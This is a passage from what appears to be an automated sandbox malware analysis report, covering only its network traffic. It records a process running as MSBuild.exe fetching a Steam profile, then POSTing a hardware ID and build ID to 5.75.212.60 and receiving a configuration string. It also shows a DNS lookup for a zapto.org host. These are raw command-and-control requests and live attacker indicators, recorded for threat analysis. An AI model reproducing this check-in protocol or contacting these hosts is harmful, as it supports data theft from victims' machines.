                                                                                      Jul 26, 2024 03:18:18.636296034 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.636357069 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.636379004 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.636389971 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.636416912 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.636456966 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.636519909 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.636569977 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.636631966 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.653474092 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.653522015 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.653562069 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.653578043 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.653603077 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.653619051 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.677984953 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.678033113 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.678042889 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678066969 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678073883 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.678096056 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678107023 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678591967 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.678636074 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.678669930 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678674936 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.678709984 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678709984 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678716898 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.678761959 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678865910 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.678924084 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678946972 CEST49753443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.678962946 CEST443497535.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.959635019 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.959682941 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:18.959753990 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.960059881 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:18.960072994 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:19.620567083 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:19.621041059 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:19.621634007 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:19.621648073 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:19.623428106 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:19.623440027 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:19.623456001 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:19.623461962 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:20.155199051 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:20.155316114 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:20.155410051 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:20.155667067 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:20.155699015 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:20.296565056 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:20.296655893 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:20.296714067 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:20.297777891 CEST49754443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:20.297796965 CEST443497545.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:20.847418070 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:20.847588062 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:20.848047972 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:20.848074913 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:20.849847078 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:20.849859953 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:21.512151957 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:21.512172937 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:21.512229919 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:21.512253046 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:21.512264967 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:21.512264967 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:21.512307882 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:21.512665987 CEST49755443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:21.512682915 CEST443497555.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:21.515348911 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:21.515393019 CEST443497565.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:21.515461922 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:21.515690088 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:21.515701056 CEST443497565.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:22.203727961 CEST443497565.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:22.203918934 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.204368114 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.204374075 CEST443497565.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:22.206098080 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.206103086 CEST443497565.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:22.881854057 CEST443497565.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:22.881942034 CEST443497565.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:22.881954908 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.881984949 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.882914066 CEST49756443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.882937908 CEST443497565.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:22.922792912 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.922837019 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:22.922941923 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.923165083 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:22.923177958 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:23.573663950 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:23.573757887 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:23.574549913 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:23.574561119 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:23.583646059 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:23.583655119 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:24.207108021 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:24.207189083 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:24.207417011 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:24.207417011 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:24.208390951 CEST49757443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:24.208410978 CEST443497575.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.013562918 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.013654947 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.013777971 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.014108896 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.014142036 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.674190044 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.674396992 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.674777985 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.674789906 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.676562071 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.676567078 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.676915884 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.676929951 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.677002907 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677015066 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.677025080 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677033901 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.677087069 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677115917 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677139044 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677162886 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:25.677232981 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:25.677246094 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.751691103 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.751763105 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.751768112 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.751821995 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.752038956 CEST49758443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.752058983 CEST443497585.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.755583048 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.755628109 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:26.755696058 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.755912066 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:26.755923986 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:27.420453072 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:27.420563936 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:27.421073914 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:27.421084881 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:27.422837973 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:27.422852039 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.086719036 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.086816072 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.086834908 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.086879015 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.087156057 CEST49759443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.087173939 CEST443497595.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.088529110 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.088581085 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.088654995 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.088866949 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.088887930 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.739867926 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.739936113 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.740348101 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.740364075 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:28.742865086 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:28.742876053 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:29.412822008 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:29.412895918 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:29.412902117 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:29.412964106 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:29.413263083 CEST49760443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:29.413278103 CEST443497605.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:59.256890059 CEST4972480192.168.2.4199.232.210.172
                                                                                      Jul 26, 2024 03:18:59.262610912 CEST8049724199.232.210.172192.168.2.4
                                                                                      Jul 26, 2024 03:18:59.262713909 CEST4972480192.168.2.4199.232.210.172

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jul 26, 2024 03:17:51.272470951 CEST6124853192.168.2.41.1.1.1
                                                                                      Jul 26, 2024 03:17:51.279875040 CEST53612481.1.1.1192.168.2.4
                                                                                      Jul 26, 2024 03:18:29.423898935 CEST5973753192.168.2.41.1.1.1
                                                                                      Jul 26, 2024 03:18:29.432693005 CEST53597371.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jul 26, 2024 03:17:51.272470951 CEST192.168.2.41.1.1.10x26b5Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                      Jul 26, 2024 03:18:29.423898935 CEST192.168.2.41.1.1.10xa2f8Standard query (0)arpdabl.zapto.orgA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jul 26, 2024 03:17:51.279875040 CEST1.1.1.1192.168.2.40x26b5No error (0)steamcommunity.com23.192.247.89A (IP address)IN (0x0001)false
                                                                                      Jul 26, 2024 03:18:10.095055103 CEST1.1.1.1192.168.2.40x367fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Jul 26, 2024 03:18:10.095055103 CEST1.1.1.1192.168.2.40x367fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                      Jul 26, 2024 03:18:29.432693005 CEST1.1.1.1192.168.2.40xa2f8No error (0)arpdabl.zapto.org77.91.101.71A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • steamcommunity.com
                                                                                      • 5.75.212.60

                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.44973023.192.247.894436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:17:52 UTC119OUTGET /profiles/76561199747278259 HTTP/1.1
                                                                                      Host: steamcommunity.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:52 UTC1870INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                      Cache-Control: no-cache
                                                                                      Date: Fri, 26 Jul 2024 01:17:52 GMT
                                                                                      Content-Length: 34725
                                                                                      Connection: close
                                                                                      Set-Cookie: sessionid=bc423e148286b84182ff57e9; Path=/; Secure; SameSite=None
                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                      2024-07-26 01:17:52 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                      2024-07-26 01:17:52 UTC10062INData Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e
                                                                                      Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
                                                                                      2024-07-26 01:17:52 UTC10149INData Raw: 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f
                                                                                      Data Ascii: kamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quo


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.4497315.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:17:53 UTC230OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:54 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:54 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.4497325.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:17:54 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 279
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:54 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 41 30 30 36 42 31 45 33 45 46 39 31 38 35 35 38 31 38 33 35 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                      Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="hwid"DA006B1E3EF91855818353-a33c7340-61ca-11ee-8c18-806e6f6e6963------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------
                                                                                      2024-07-26 01:17:55 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:55 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:55 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 3a1|1|1|0|7d260c1b355efdc632e7bde77b366a9d|1|1|1|0|0|50000|00


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.4497335.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:17:56 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
